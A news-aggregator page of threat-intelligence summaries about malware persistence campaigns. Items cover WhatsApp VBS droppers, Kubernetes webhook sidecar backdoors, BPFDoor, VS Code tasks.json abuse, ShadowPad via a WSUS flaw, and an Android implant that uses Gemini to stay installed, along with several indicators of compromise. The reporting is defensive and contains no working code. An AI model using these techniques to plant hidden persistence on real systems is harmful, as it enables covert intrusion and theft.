All news with #persistence tag

⚠ Microsoft has alerted to a late-February 2026 campaign that uses WhatsApp messages to deliver malicious Visual Basic Script (VBS) files which trigger a multi-stage infection chain. According to Microsoft Defender, the scripts create hidden folders under C:\ProgramData, drop renamed Windows utilities (for example, curl.exe as netapi.dll and bitsadmin.exe as sc.exe), and retrieve secondary payloads from trusted cloud providers. Attackers then attempt UAC tampering, modify registry entries, and install unsigned MSI packages to secure persistence and remote access, with some installers deploying legitimate remote‑access tools.

🛡️ Microsoft warns of a WhatsApp-distributed malware campaign that uses malicious Visual Basic Script (VBS) files to gain persistence and remote access on Windows systems. The VBS scripts perform delayed, multi-stage execution and deploy renamed legitimate utilities (for example, curl.exe and bitsadmin.exe) under misleading filenames to blend in. Payloads are hosted on reputable cloud providers and culminate in installing malicious Microsoft Installer (MSI) packages that act as backdoors. Microsoft recommends monitoring script and installer execution and watching for misuse of trusted system tools.

🔒 Kubernetes clusters can be undermined by the very automation that makes them resilient. By registering or compromising a controller—most commonly via a MutatingWebhookConfiguration—an attacker can intercept pod-creation requests and inject a covert sidecar, turning the cluster’s control loop into a self-healing backdoor. These injections are often invisible to casual inspection, survive pod restarts and upgrades, and can be disguised under benign names. Teams should audit webhooks, monitor RoleBindings and OwnerReferences, and restrict webhook registration to reduce this risk.

🔒 A long-running espionage campaign attributed to China-linked threat cluster Red Menshen has embedded stealthy kernel-level implants into telecom networks to maintain persistent, low-noise access. Rapid7 highlights BPFDoor, a Linux backdoor that leverages Berkeley Packet Filter functionality to trigger shells only when a specifically crafted "magic" packet is seen, avoiding open listeners and conventional C2 channels. The actor also deploys CrossC2, Sliver, TinyShell, credential harvesting tools and a controller that can operate inside victim environments to enable lateral movement and covert monitoring.

🐉 Silver Dragon is a China-nexus cyber espionage group focusing on government ministries and public sector organizations across Southeast Asia, with additional victims identified in Europe. The group gains access through exploitation of public-facing servers and targeted phishing campaigns. It maintains long-term persistence by hijacking legitimate Windows services and deploying a custom backdoor, GearDoor, which uses Google Drive for covert C2, blending malicious activity with trusted services to evade detection.

🔒 Picus Security's annual red-teaming report finds ransomware operators shifting from noisy encryption to stealthy, long-term access, favoring persistence, defense evasion and data exfiltration. The firm reports a 38% drop in encryption as attackers prioritize double-extortion and silent leaks, often routing C2 traffic through trusted services like OpenAI and AWS. Experts urge stronger identity controls, monitoring of third-party integrations, and detections tuned to persistence and exfiltration.

🔐 ESET researchers have identified an Android implant, dubbed PromptSpy, that leverages generative AI to maintain persistence on victims' devices and represents an evolution of earlier VNCSpy samples. The implant sends serialized UI snapshots to Google's Gemini, receives step-by-step Accessibility Service actions to keep the malicious app pinned in Recent Apps, and executes those actions while a VNC module provides remote viewing and control. The initial dropper impersonated JPMorgan Argentina and distributed via mgardownload[.]com; communications use AES-encrypted VNC to a hardcoded C2 at 54.67.2[.]84. PromptSpy also overlays invisible UI elements to block uninstallation; the only reliable removal is rebooting into Safe Mode.

🔐 Mandiant and the Google Threat Intelligence Group (GTIG) identified exploitation of a critical vulnerability in Dell RecoverPoint for Virtual Machines, CVE-2026-22769, used by UNC6201 since mid‑2024. The actor uploaded malicious WAR files to the embedded Tomcat Manager—leveraging hard‑coded admin credentials—to deploy a SLAYSTYLE web shell and gain root. In compromised appliances, UNC6201 established persistence by modifying convert_hosts.sh and later replaced BRICKSTORM implants with a native AOT‑compiled C# backdoor named GRIMBOLT. Investigators also observed novel VMware pivoting techniques, including temporary "Ghost NICs" and iptables‑based Single Packet Authorization. Dell published mitigations and GTIG/Mandiant released IOCs, YARA rules, and hunting guidance to aid detection and response.

🔐 Accenture has uncovered a novel malware named RustyRocket deployed by the World Leaks extortion group to maintain stealthy persistence and proxy exfiltration across Windows and Linux environments. Written in Rust, the tool uses multi-layer encrypted tunnels, heavy obfuscation and a pre-encrypted runtime configuration guardrail that makes activity difficult to detect and monitor. Accenture advises monitoring anomalous outbound transfers and enforcing network segmentation to limit lateral movement.

🛡️ Researchers at Huntress found the Crazy ransomware gang abusing legitimate employee-monitoring software alongside the SimpleHelp remote support tool to maintain persistence, evade detection, and prepare ransomware deployment. Attackers installed Net Monitor for Employees Professional via msiexec.exe to view desktops, transfer files, and execute commands, then added SimpleHelp for redundant access. Huntress warns organizations to enforce MFA and monitor for unauthorized remote-management tools.

🛡️ Cisco Talos describes VoidLink as a modular implant management framework focused on Linux, providing advanced persistence, evasion, and plugin-based extensibility. The framework implements RBAC, mesh P2P communications, compile-on-demand plugins, and kernel-level components to hide implants and C2 infrastructure. Talos attributes VoidLink use to an actor tracked as UAT-9921, notes rapid AI-assisted development, and highlights cloud-aware scanning and broad targeting.

🦠 Picus Security's Red Report 2026 analyzed over 1.1 million malicious files and 15.5 million actions, finding attackers favor stealthy persistence and evasion to silently exfiltrate data for extortion. Process injection accounted for 30% of techniques, while adversaries routed C2 through high-reputation services like OpenAI and AWS and used stolen browser passwords to masquerade as users. The report warns that virtualization/sandbox evasion and increased technique counts make detection more challenging.

🔍 The Picus Red Report 2026 analyzed more than 1.1 million malicious files and 15.5 million adversarial actions across 2025 and finds attackers shifting from disruptive ransomware to long-lived, stealthy residency. Rather than encrypting systems, adversaries focus on credential theft, process injection, sandbox evasion and quiet data exfiltration. The report urges defenders to prioritize behavior-based detection, credential hygiene and continuous adversarial validation to restore visibility.

🔍 HarfangLab detected a Farsi-speaking, Iran-aligned campaign codenamed RedKitten in January 2026 that targets NGOs and individuals documenting recent human rights abuses. The operation begins with a Farsi-named 7‑Zip archive containing macro-laced Excel files; embedded VBA macros, which analysts say show signs of LLM generation, drop a C# implant via AppDomainManager injection. The backdoor, SloppyMIO, uses GitHub and Google Drive for steganographic configuration retrieval and leverages Telegram for command-and-control, supporting multiple modules to run commands, collect and exfiltrate files, deploy payloads and establish persistence.

⚠️ The Google Threat Intelligence Group (GTIG) has observed widespread exploitation of WinRAR via the critical path traversal vulnerability CVE-2025-8088, which attackers use to drop payloads into the Windows Startup folder by abusing Alternate Data Streams (ADS). Adversaries—from government-backed Russian and Chinese groups to financially motivated operators—craft RAR archives that conceal decoy documents and hidden ADS entries to achieve persistence. Defenders should prioritize installing the WinRAR patch, enable Safe Browsing protections, and hunt for ADS extraction activity and newly created Startup-folder LNK/HTA/BAT artifacts.

🔒 Cybersecurity researchers describe a two-wave phishing campaign that uses fake Greenvelope invitations to harvest Microsoft Outlook, Yahoo! and AOL credentials, then leverages those stolen logins to register and deploy legitimate LogMeIn RMM tools. Attackers deliver a signed executable, GreenVelopeCard.exe, containing a JSON configuration that silently installs LogMeIn Resolve and connects to an attacker-controlled URL. The RMM is configured for persistent, elevated access and hidden scheduled tasks to ensure survival and ongoing remote control.

⚠️ Threat actors tied to DPRK-backed Contagious Interview are weaponizing Visual Studio Code project configurations to execute malicious payloads when developers open and trust cloned repositories. Jamf Threat Labs observed attackers embedding commands in tasks.json that spawn shell processes to fetch and run obfuscated JavaScript via Node.js, establishing a persistent backdoor that can survive closing the IDE. Users should vet unfamiliar repos, inspect task and package files, and avoid running npm install without review.

🚨 ReliaQuest warns that Storm-0249 appears to be evolving from an initial access broker into an active operator, adopting domain spoofing, DLL side-loading and fileless PowerShell execution to facilitate ransomware intrusions. The actor used a Microsoft-mimicking URL and the Windows Run dialog to fetch and execute a PowerShell script that installed a trojanized SentinelOne DLL via a malicious MSI. This technique leverages living-off-the-land utilities and signed processes to maintain persistence and evade detection.

🔍 CrowdStrike identified a China-nexus adversary, WARP PANDA, conducting covert intrusions against VMware vCenter and cloud infrastructure throughout 2025, deploying novel Golang implants and the backdoor BRICKSTORM. Operations emphasized stealth—log clearing, timestomping, unregistered VMs, and tunnelling via vCenter/ESXi/guest VMs—enabling long-term persistence and data staging from live VM snapshots. WARP PANDA also exfiltrated Microsoft 365 and SharePoint content, registered MFA devices, and abused cloud services for C2, prompting recommendations for tighter ESXi/vCenter controls and robust EDR on guests.

🛡️ A recently patched WSUS deserialization flaw, CVE-2025-59287, has been weaponized to install the ShadowPad backdoor on Windows servers. AhnLab's ASEC reports attackers used PowerCat to spawn a CMD shell and then leveraged certutil and curl to retrieve payloads from 149.28.78.189:42306. ShadowPad was deployed via DLL side-loading of ETDApix.dll by ETDCtrlHelper.exe and runs as an in-memory loader with plugin support, anti-detection, and persistence.